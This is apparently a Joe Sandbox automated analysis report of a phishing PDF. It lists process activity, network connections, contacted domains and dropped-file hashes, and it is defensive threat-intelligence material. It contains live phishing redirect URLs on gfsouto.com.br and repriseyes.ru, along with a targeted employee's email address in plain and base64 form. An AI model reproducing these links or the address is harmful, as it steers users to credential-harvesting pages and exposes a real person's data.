Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.winPDF@36/79@49/388
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 14-48-26-677.log
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Bontrageroutdoors_Project_Update_202557516.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1552,i,16697441943994709585,9088590074963945939,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding A5DD2E3E2A89DDCECDAB6BAF2CCAFDE2
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.babylon-software.com/redirects/redir.cgi?type=wikipedia&full_url=https%3A%2F%2Fgfsouto.com.br%2Fcgi-documents%2F%23amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1788,i,14068435208474210693,11660432059322671289,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1552,i,16697441943994709585,9088590074963945939,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1788,i,14068435208474210693,11660432059322671289,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Bontrageroutdoors_Project_Update_202557516.pdfInitial sample: PDF keyword /JS count = 0
Source: Bontrageroutdoors_Project_Update_202557516.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: Bontrageroutdoors_Project_Update_202557516.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformation
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation3
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0016.t-0009.t-msedge.net
13.107.246.44
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
        217.20.57.42
        truefalse
          high
          www-new.babylon-software.com
          174.138.88.129
          truefalse
            unknown
            gfsouto.com.br
            108.179.241.236
            truetrue
              unknown
              code.jquery.com
              151.101.66.137
              truefalse
                high
                cdnjs.cloudflare.com
                104.17.25.14
                truefalse
                  high
                  challenges.cloudflare.com
                  104.18.95.41
                  truefalse
                    high
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      high
                      www.google.com
                      142.250.181.228
                      truefalse
                        high
                        g3su5gwndwqyymo0d5hm5pnuvuzr1j401t2nhxlz8lijntzzlmt.expritraw.ru
                        188.114.96.3
                        truefalse
                          unknown
                          reprise.repriseyes.ru
                          188.114.97.3
                          truetrue
                            unknown
                            picsum.photos
                            104.26.5.30
                            truefalse
                              high
                              www.office.com
                              unknown
                              unknownfalse
                                high
                                x1.i.lencr.org
                                unknown
                                unknownfalse
                                  high
                                  aadcdn.msftauth.net
                                  unknown
                                  unknownfalse
                                    high
                                    www.babylon-software.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      use.fontawesome.com
                                      unknown
                                      unknownfalse
                                        high
                                        identity.nel.measure.office.net
                                        unknown
                                        unknownfalse
                                          high
                                          login.microsoftonline.com
                                          unknown
                                          unknownfalse
                                            high
                                            fastly.picsum.photos
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              https://reprise.repriseyes.ru/ri0M/#Djessica.loving@bontrageroutdoors.comfalse
                                                unknown
                                                https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29ttrue
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  13.107.6.156
                                                  unknownUnited States
                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  104.26.5.30
                                                  picsum.photosUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  172.217.16.138
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  217.20.57.42
                                                  default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comDenmark
                                                  15516DK-DANSKKABELTVDKfalse
                                                  172.67.142.245
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  13.107.246.45
                                                  s-part-0017.t-0009.t-msedge.netUnited States
                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  151.101.1.91
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  13.107.246.44
                                                  s-part-0016.t-0009.t-msedge.netUnited States
                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  151.101.129.91
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  20.190.159.64
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  52.178.17.233
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  174.138.88.129
                                                  www-new.babylon-software.comUnited States
                                                  14061DIGITALOCEAN-ASNUSfalse
                                                  23.209.209.135
                                                  unknownUnited States
                                                  23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
                                                  142.250.185.163
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.185.142
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  151.101.66.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  35.190.80.1
                                                  a.nel.cloudflare.comUnited States
                                                  15169GOOGLEUSfalse
                                                  172.64.41.3
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  108.179.241.236
                                                  gfsouto.com.brUnited States
                                                  46606UNIFIEDLAYER-AS-1UStrue
                                                  3.219.243.226
                                                  unknownUnited States
                                                  14618AMAZON-AESUSfalse
                                                  104.17.24.14
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  40.79.141.154
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  1.1.1.1
                                                  unknownAustralia
                                                  13335CLOUDFLARENETUSfalse
                                                  20.190.159.73
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  104.18.95.41
                                                  challenges.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  40.126.32.72
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  2.23.240.205
                                                  unknownEuropean Union
                                                  8781QA-ISPQAfalse
                                                  142.250.181.227
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  188.114.97.3
                                                  reprise.repriseyes.ruEuropean Union
                                                  13335CLOUDFLARENETUStrue
                                                  142.250.185.174
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.181.228
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  188.114.96.3
                                                  g3su5gwndwqyymo0d5hm5pnuvuzr1j401t2nhxlz8lijntzzlmt.expritraw.ruEuropean Union
                                                  13335CLOUDFLARENETUSfalse
                                                  64.233.184.84
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  2.16.238.149
                                                  unknownEuropean Union
                                                  20940AKAMAI-ASN1EUfalse
                                                  96.17.64.171
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  104.17.25.14
                                                  cdnjs.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  IP
                                                  192.168.2.17
                                                  192.168.2.16
                                                  192.168.2.23
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1588098
                                                  Start date and time:2025-01-10 20:47:51 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:18
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  Analysis Mode:stream
                                                  Analysis stop reason:Timeout
                                                  Sample name:Bontrageroutdoors_Project_Update_202557516.pdf
                                                  Detection:MAL
                                                  Classification:mal56.phis.winPDF@36/79@49/388
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .pdf
                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 2.23.242.162
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • VT rate limit hit for: www-new.babylon-software.com
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):290
                                                  Entropy (8bit):5.171027120552851
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C021C894B9DF2E7CC8C5EFDEAA65FD69
                                                  SHA1:C0C6C2F57E7D4F841F210A48E605BA567586B3A3
                                                  SHA-256:6A1A63A5572A6DBFB56D500F4ADDCA710CA1C0C55E81504DEABF8392FA4E8B77
                                                  SHA-512:00086CF22FAFEFAB8F1B41E3ED2FB15F6CA688FA5470840CA15FCF6046FC355C32D64B7AEC4DA694E380848275BCC58F72545A533064D7BAFD041810FEAA05BA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:2025/01/10-14:48:25.041 1848 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/10-14:48:25.046 1848 Recovering log #3.2025/01/10-14:48:25.046 1848 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):334
                                                  Entropy (8bit):5.138080723801909
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:35EE2769C6CC3257B519B9CC2D314DE2
                                                  SHA1:9E2AE4CF49A57AF4FDDD07CF45D8BE6EA8CC58F8
                                                  SHA-256:FDCBBDFC75257E02013F67BFFFB5BA2CB11E2FCBE0007EEDB5DBED61FEB7B99D
                                                  SHA-512:A654E33D9110F7B4F14123CE9478E808A4BD86B06EEEC1969FA55FA20BEFA3057788E36EC5606FAA42358C29B6F31DC9CBF1F3ED2A8D382A361A9F0C115CF00E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:2025/01/10-14:48:24.905 19a0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/10-14:48:24.909 19a0 Recovering log #3.2025/01/10-14:48:24.909 19a0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):403
                                                  Entropy (8bit):4.981922964021605
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5805D3D66B5BCD1BDB86F12156BE04FD
                                                  SHA1:07C5E8B77BB8F0CE1FF07B6B1916A720E43256B4
                                                  SHA-256:AF11DBC43DD9623B4A9BA23132B9D411754B2B1D40C7837954066FD18E8733E6
                                                  SHA-512:93D0472366FAE40CCEE9854104D3AE0BA7DC61F74DDD60F7FCAF71D42A98D121607A93DAF48331954B5B1844B51A80C065498576EF06C01BFCC7E01ACA6A80E8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381098517139995","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":135656},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4C313FE514B5F4E7E89329630909F8DC
                                                  SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                  SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                  SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4C313FE514B5F4E7E89329630909F8DC
                                                  SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                  SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                  SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                  Malicious:false
                                                  Reputation:unknown
